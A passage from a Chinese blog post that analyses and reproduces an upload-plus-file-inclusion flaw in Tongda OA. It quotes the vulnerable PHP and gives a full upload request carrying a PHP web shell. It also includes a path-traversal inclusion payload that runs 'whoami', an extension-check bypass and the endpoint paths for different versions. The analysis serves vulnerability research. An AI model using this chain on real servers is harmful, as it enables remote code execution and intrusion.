            else {
                $ATTACH_NAME_UTF8 = $ATTACH_NAME;
            }

if (preg_match(&quot;/[\':&lt;&gt;?]|\/|\\\\|\&quot;|\|/u&quot;, $ATTACH_NAME_UTF8)) {
                $ERROR_DESC = sprintf(_(&quot;文件名[%s]包含[/\'\&quot;:*?&lt;&gt;|]等非法字符&quot;), $ATTACH_NAME);
            }

if ($ATTACH_SIZE == 0) {
                $ERROR_DESC = sprintf(_(&quot;文件[%s]大小为0字节&quot;), $ATTACH_NAME);
            }

if ($ERROR_DESC == &quot;&quot;) {
                $ATTACH_NAME = str_replace(&quot;'&quot;, &quot;&quot;, $ATTACH_NAME);
                $ATTACH_ID = add_attach($ATTACH_FILE, $ATTACH_NAME, $MODULE);

if ($ATTACH_ID === false) {

$ERROR_DESC = sprintf(_(&quot;文件[%s]上传失败&quot;), $ATTACH_NAME);
            }
            else {
                $ATTACHMENTS[&quot;ID&quot;] .= $ATTACH_ID . &quot;,&quot;;
                $ATTACHMENTS[&quot;NAME&quot;] .= $ATTACH_NAME . &quot;*&quot;;
            }
        }

@unlink($ATTACH_FILE);
    }
    else if ($ATTACH_ERROR == UPLOAD_ERR_INI_SIZE) {
        $ERROR_DESC = sprintf(_(&quot;文件[%s]的大小超过了系统限制（%s）&quot;), $ATTACH_NAME, ini_get(&quot;upload_max_filesize&quot;));
    }
    else if ($ATTACH_ERROR == UPLOAD_ERR_FORM_SIZE) {
        $ERROR_DESC = sprintf(_(&quot;文件[%s]的大小超过了表单限制&quot;), $ATTACH_NAME);
    }
    else if ($ATTACH_ERROR == UPLOAD_ERR_PARTIAL) {
        $ERROR_DESC = sprintf(_(&quot;文件[%s]上传不完整&quot;), $ATTACH_NAME);
    }
    else if ($ATTACH_ERROR == UPLOAD_ERR_NO_TMP_DIR) {
        $ERROR_DESC = sprintf(_(&quot;文件[%s]上传失败：找不到临时文件夹&quot;), $ATTACH_NAME);
    }
    else if ($ATTACH_ERROR == UPLOAD_ERR_CANT_WRITE) {
        $ERROR_DESC = sprintf(_(&quot;文件[%s]写入失败&quot;), $ATTACH_NAME);
    }
    else {
        $ERROR_DESC = sprintf(_(&quot;未知错误[代码：%s]&quot;), $ATTACH_ERROR);
    }

if ($ERROR_DESC != &quot;&quot;) {
        if (!$OUTPUT) {
            delete_attach($ATTACHMENTS[&quot;ID&quot;], $ATTACHMENTS[&quot;NAME&quot;], $MODULE);

return $ERROR_DESC;
        }
        else {
            Message(_(&quot;错误&quot;), $ERROR_DESC);
        }
    }
}

return $ATTACHMENTS;</code></pre>}调用了同文件下的is_uploadable()函数对文件名进行检查：<pre><code>if (!is_uploadable($ATTACH_NAME)) {
 $ERROR_DESC = sprintf(_(&quot;禁止上传后缀名为[%s]的文件&quot;), substr($ATTACH_NAME, strrpos($ATTACH_NAME, &quot;.&quot;) + 1));
 }
</code></pre>圈出来的代码代码意思是寻找最后一次出现 . 的位置，然后寻找后三个字符，然后变成小写字符看是否匹配字符’php’，绕过方式也很简单在最后加.即可,不过上传的文件不在web目录所以没什么用<img src="http://blog.mo60.cn/usr/uploads/2022/04/1444458273.png" alt="60827-287av6p397x.png" title="60827-287av6p397x.png"style="">然后构造文件上传包<pre><code>POST /ispirit/im/upload.php HTTP/1.1
Host: 192.168.10.161
Content-Length: 656
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJQo61MS4LliQDRSH
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryJQo61MS4LliQDRSH
Content-Disposition: form-data; name=&quot;UPLOAD_MODE&quot;

1
------WebKitFormBoundaryJQo61MS4LliQDRSH
Content-Disposition: form-data; name=&quot;P&quot;

1
------WebKitFormBoundaryJQo61MS4LliQDRSH
Content-Disposition: form-data; name=&quot;DEST_UID&quot;

1
------WebKitFormBoundaryJQo61MS4LliQDRSH
Content-Disposition: form-data; name=&quot;ATTACHMENT&quot;; filename=&quot;jpg&quot;
Content-Type: image/jpeg

&lt;?php
$command=$_POST['cmd'];
$wsh = new COM('WScript.shell');
$exec = $wsh-&gt;exec(&quot;cmd /c &quot;.$command);
$stdout = $exec-&gt;StdOut();
$stroutput = $stdout-&gt;ReadAll();
echo $stroutput;
?&gt;
------WebKitFormBoundaryJQo61MS4LliQDRSH--
</code></pre><img src="http://blog.mo60.cn/usr/uploads/2022/04/933791755.png" alt="09983-7bur5pdiha.png" title="09983-7bur5pdiha.png"style="">文件存在于MYOA\attach\im 下<img src="http://blog.mo60.cn/usr/uploads/2022/04/3672268077.png" alt="77379-k7krq5rr0j.png" title="77379-k7krq5rr0j.png"style=""><h3>3.2文件包含</h3>漏洞文件位于ispirit/interface/gateway.php<pre><code>&lt;?php

ob_start();
include_once &quot;inc/session.php&quot;;
include_once &quot;inc/conn.php&quot;;
include_once &quot;inc/utility_org.php&quot;;

if ($P != &quot;&quot;) {
    if (preg_match(&quot;/[^a-z0-9;]+/i&quot;, $P)) {
        echo _(&quot;非法参数&quot;);
        exit();
    }

if ($json) {
    $json = stripcslashes($json);
    $json = (array) json_decode($json);

foreach ($json as $key =&gt; $val ) {
        if ($key == &quot;data&quot;) {
            $val = (array) $val;

foreach ($val as $keys =&gt; $value ) {
                $keys = $value;
            }
        }

if ($key == &quot;url&quot;) {
            $url = $val;
        }
    }

if ($url != &quot;&quot;) {
        if (substr($url, 0, 1) == &quot;/&quot;) {
            $url = substr($url, 1);
        }

if ((strpos($url, &quot;general/&quot;) !== false) || (strpos($url, &quot;ispirit/&quot;) !== false) || (strpos($url, &quot;module/&quot;) !== false)) {
            include_once $url;
        }
    }

exit();
}

?&gt;
</code></pre>对$P进行了是否为空、判断当前用户是否登录，只需要使$P为空就不会进入if条件<pre><code>if ($P != &quot;&quot;) {
 if (preg_match(&quot;/[^a-z0-9;]+/i&quot;, $P)) {
 echo _(&quot;非法参数&quot;);
 exit();
 }

session_id($P);
 session_start();
 session_write_close();
 if (($_SESSION[&quot;LOGIN_USER_ID&quot;] == &quot;&quot;) || ($_SESSION[&quot;LOGIN_UID&quot;] == &quot;&quot;)) {
 echo _(&quot;RELOGIN&quot;);
 exit();
 }
}
</code></pre>之后从json中获取url参数的，以只要在传入的json数据中使url参数中包含ispirit/、general/、module/再跳转目录到包含的文件即可进行任意文件包含。<pre><code>if ($json) {
 $json = stripcslashes($json); //去掉反斜杠 
 $json = (array) json_decode($json);//转为数组
 //遍历
 foreach ($json as $key =&gt; $val ) {
 if ($key == &quot;data&quot;) {
 $val = (array) $val;

foreach ($val as $keys =&gt; $value ) {
                $keys = $value;
            }
        }
        //判断是否有url这个键,有的话把值赋值给$url
        if ($key == &quot;url&quot;) {
            $url = $val;
        }
    }
    //$url不为空进入if
    if ($url != &quot;&quot;) {
        //如果是/开头，就去除/
        if (substr($url, 0, 1) == &quot;/&quot;) {
            $url = substr($url, 1);
        }
        //判断参数是否包含ispirit/、general/、module/
        if ((strpos($url, &quot;general/&quot;) !== false) || (strpos($url, &quot;ispirit/&quot;) !== false) || (strpos($url, &quot;module/&quot;) !== false)) {
            include_once $url;
        }
    }

exit();
}
</code></pre><h2>0x04 漏洞复现</h2>成功上传后,现在开始包含payload：<pre><code>json={&quot;url&quot;:&quot;ispirit/../../attach/im/2204/436106789.jpg&quot;}&amp;cmd=whoami
</code></pre>成功执行<img src="http://blog.mo60.cn/usr/uploads/2022/04/2900217918.png" alt="03765-9t7mzqvs8bf.png" title="03765-9t7mzqvs8bf.png"style="">前面说过可以用.php.来绕过is_uploadable函数的检测，这里演示一下<img src="http://blog.mo60.cn/usr/uploads/2022/04/737350858.png" alt="21084-q0i0n8jiim.png" title="21084-q0i0n8jiim.png"style="">查看<img src="http://blog.mo60.cn/usr/uploads/2022/04/227256759.png" alt="77389-7kx5akdlu0n.png" title="77389-7kx5akdlu0n.png"style=""><h2>0x05版本路径</h2>有些版本gateway.php路径不同 例如2013：<pre><code>/ispirit/im/upload.php
/ispirit/interface/gateway.php
</code></pre>例如2017：<pre><code>/ispirit/im/upload.php
/mac/gateway.php
</code></pre><h2>0x06 参考</h2><a class="no-external-link" href="https://xz.aliyun.com/t/7424" target="_blank">https://xz.aliyun.com/t/7424</a>

通达OA文件上传+任意文件包含漏洞分析复现

0x1 影响范围

0x02 环境搭建

0x03漏洞分析

3.1文件上传

3.2文件包含

0x04 漏洞复现

0x05版本路径

0x06 参考

Leave a Comment Cancel reply
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款，评论的邮箱不会被公开仅用于接收回复。

题目+答案+2023年全国职业院校技能大赛信息安全管理与评估真题

后渗透神器Cobalt Strike使用教程

2023年全国职业院校技能大赛信息安全管理与评估-3阶段web复盘模拟解析

记第一次cve申请之旅

记2022年福建省第三届“闽盾杯”网络空间安全大赛黑盾赛道从线上初赛到决赛writeup解析

php下base64过waf小tips

Typecho1.2 - 1.2.1-rc前台评论存储xss到rce 漏洞复现-分析-修复

记一次有趣的登入逻辑

mysql科学计数法之sql注入bypass

kodbox(可道云)管理员权限Getshell

通达OA文件上传+任意文件包含漏洞分析复现

0x1 影响范围

0x02 环境搭建

0x03漏洞分析

3.1文件上传

3.2文件包含

0x04 漏洞复现

0x05版本路径

0x06 参考

Leave a Comment Cancel reply 使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款，评论的邮箱不会被公开仅用于接收回复。

通达OA文件上传+任意文件包含漏洞分析复现

Leave a Comment Cancel reply
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款，评论的邮箱不会被公开仅用于接收回复。